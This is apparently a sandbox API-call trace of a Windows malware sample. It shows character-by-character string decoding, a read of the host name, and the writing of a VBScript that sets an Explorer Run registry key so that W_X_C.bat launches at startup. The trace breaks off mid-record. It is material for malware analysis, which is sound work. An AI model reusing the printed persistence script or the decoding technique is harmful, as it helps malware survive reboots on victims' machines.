(in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0084.229] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0084.229] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.230] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.230] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.230] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="/", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/", lpUsedDefaultChar=0x0) returned 1 [0084.231] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0084.231] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9", lpUsedDefaultChar=0x0) returned 1 [0084.232] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=",", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr=",") returned 1 [0084.232] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="/", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/", lpUsedDefaultChar=0x0) returned 1 [0084.233] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0084.233] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_", lpUsedDefaultChar=0x0) returned 1 [0084.233] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0084.234] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.234] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.234] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T", lpUsedDefaultChar=0x0) returned 1 [0084.235] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="G", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0084.235] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.236] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.236] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0084.236] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0084.237] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g", lpUsedDefaultChar=0x0) returned 1 [0084.237] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Z", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="Z") returned 1 [0084.237] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="/", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/", lpUsedDefaultChar=0x0) returned 1 [0084.238] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0084.238] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.239] SysStringLen (param_1=" ") returned 0xff [0084.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0084.239] SysStringLen (param_1=" ") returned 0xff [0084.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe55514, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0084.288] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="kernel32", cbMultiByte=8, lpWideCharStr=0x28e098, cchWideChar=2047 | out: lpWideCharStr="kernel32") returned 8 [0084.289] SysReAllocStringLen (in: pbstr=0x28f0d0*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x28f0d0*="kernel32") returned 1 [0084.289] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0084.289] GetModuleHandleA (lpModuleName="kernel32") returned 0x75a80000 [0084.289] GetProcAddress (hModule=0x75a80000, lpProcName="GetComputerNameA") returned 0x75aab6b8 [0084.289] GetComputerNameA (in: lpBuffer=0xe55514, nSize=0x28f10c | out: lpBuffer="Q9IATRKPRH", nSize=0x28f10c) returned 1 [0084.290] GetLastError () returned 0xcb [0084.290] SysStringByteLen (bstr="㥑䅉剔偋䡒 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0084.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Q9IATRKPRH", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0084.290] SysStringByteLen (bstr="㥑䅉剔偋䡒 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0084.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Q9IATRKPRH", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Q9IATRKPRH") returned 256 [0084.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0084.290] VarSub (in: pvarLeft=0x28f140, pvarRight=0x28f110, pvarResult=0x28f130 | out: pvarResult=0x28f130) returned 0x0 [0084.291] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f434, pvarResult=0x28f424 | out: pvarResult=0x28f424) returned 0x0 [0084.291] VarCat (in: pvarLeft=0x28f424, pvarRight=0x28f60c, pvarResult=0x28f414 | out: pvarResult=0x28f414) returned 0x0 [0084.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\windows\\W_X_C.vbs", cchWideChar=-1, lpMultiByteStr=0x28ef30, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\windows\\W_X_C.vbs", lpUsedDefaultChar=0x0) returned 21 [0084.301] GetFullPathNameA (in: lpFileName="C:\\windows\\W_X_C.vbs", nBufferLength=0x104, lpBuffer=0x28f060, lpFilePart=0x28ef28 | out: lpBuffer="C:\\windows\\W_X_C.vbs", lpFilePart=0x28ef28*="W_X_C.vbs") returned 0x14 [0084.302] CreateFileA (lpFileName="C:\\windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x28f020, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.441] GetFileType (hFile=0x15c) returned 0x1 [0084.441] IMalloc:Alloc (This=0x76da66bc, cb=0x250) returned 0xe56eb0 [0084.441] IMalloc:Realloc (This=0x76da66bc, pv=0x0, cb=0x60) returned 0xe3fd78 [0084.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="on error resume next", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="on error resume next", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="on error resume next", cchWideChar=20, lpMultiByteStr=0xe4a974, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="on error resume next", lpUsedDefaultChar=0x0) returned 20 [0084.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe4a974, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dim t", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dim t", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dim t", cchWideChar=5, lpMultiByteStr=0xe4a974, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dim t", lpUsedDefaultChar=0x0) returned 5 [0084.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe4a974, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="set t = CreateObject(\"WScript.Shell\")", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0084.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="set t = CreateObject(\"WScript.Shell\")", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0084.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="set t = CreateObject(\"WScript.Shell\")", cchWideChar=37, lpMultiByteStr=0xe37374, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="set t = CreateObject(\"WScript.Shell\")", lpUsedDefaultChar=0x0) returned 37 [0084.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe4a974, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t.regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH\",\"W_X_C.bat\",\"REG_SZ\"", cchWideChar=127, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 127 [0084.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t.regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH\",\"W_X_C.bat\",\"REG_SZ\"", cchWideChar=127, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 127 [0084.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t.regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH\",\"W_X_C.bat\",\"REG_SZ\"", cchWideChar=127, lpMultiByteStr=0xe5562c, cbMultiByte=127, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t.regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH\",\"W_X_C.bat\",\"REG_SZ\"", lpUsedDefaultChar=0x0) returned 127 [0084.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe4a974, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.446] WriteFile (in: hFile=0x15c, lpBuffer=0xe56ee8*, nNumberOfBytesToWrite=0xc5, lpNumberOfBytesWritten=0x28ecec, lpOverlapped=0x0 | out: lpBuffer=0xe56ee8*, lpNumberOfBytesWritten=0x28ecec*=0xc5, lpOverlapped=0x0) returned 1 [0084.449] CloseHandle (hObject=0x15c) returned 1 [0084.451] IMalloc:Free (This=0x76da66bc, pv=0xe56eb0) [0084.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p", lpUsedDefaultChar=0x0) returned 1 [0084.452] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.452] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G", lpUsedDefaultChar=0x0) returned 1 [0084.452] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0084.453] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.453] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.453] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.454] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.454] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.455] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.455] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.456] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.456] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0084.456] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0084.457] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.457] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.458] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.458] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.460] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.460] VarSub (in: pvarLeft=0x28f49c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.461] VarCat (in: pvarLeft=0x28f5cc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, 